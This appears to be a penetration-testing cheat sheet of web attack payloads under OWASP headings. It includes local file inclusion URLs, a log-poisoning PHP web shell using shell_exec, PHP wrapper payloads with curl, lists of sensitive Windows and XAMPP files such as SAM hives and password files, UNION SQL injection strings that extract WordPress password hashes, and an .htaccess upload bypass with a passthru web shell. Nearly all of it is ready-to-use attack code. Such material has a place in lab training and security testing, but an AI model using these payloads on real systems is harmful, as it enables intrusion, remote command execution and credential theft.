Skip to content

OWASP

OWASP GPLv3 license

LFI

Simple 

http://10.11.1.35/section.php?page=/etc/passwd

Poison Logs 

nc -nv 10.11.0.22 80
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Wrappers 

http://192.168.196.10/menu.php?file=data:text/plain,<?php echo shell_exec("ipconfig") ?>
http://192.168.1.132/?lang=php://filter/convert.base64-encode/resource=index
curl -s --data "<?system('$command');?>" "http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"

Critical Files

Windows
c:\Windows\win.ini
c:\windows\System32\drivers\etc\hosts
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
C:/Program Files/FileZilla Server/FileZilla Server.xml
Xampp
C:/xampp/apache/conf/httpd.conf
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/tomcat/conf/web.xml
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webalizer/webdav.txt
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
C:/xampp/passwords.txt
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

SQLI

sandbox exercise 

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"]
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#"]
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"]
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#"]

Microsoft SQL Server (MSSQL) 

', convert(int,@@version) ) --

FileUpload

.htaccess trick
#.htaccess
<FilesMatch "evil.png">
SetHandler application/x-httpd-php
AddHandler php-script .png
</FilesMatch>

#evil.png
<?php passthru($_REQUEST['cmd']); ?>
Extensions
#PHP
.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc

#ASP
.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

#Jsp
.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

#Coldfusion
.cfm, .cfml, .cfc, .dbm

#Flash: 
.swf

#Perl
.pl, .cgi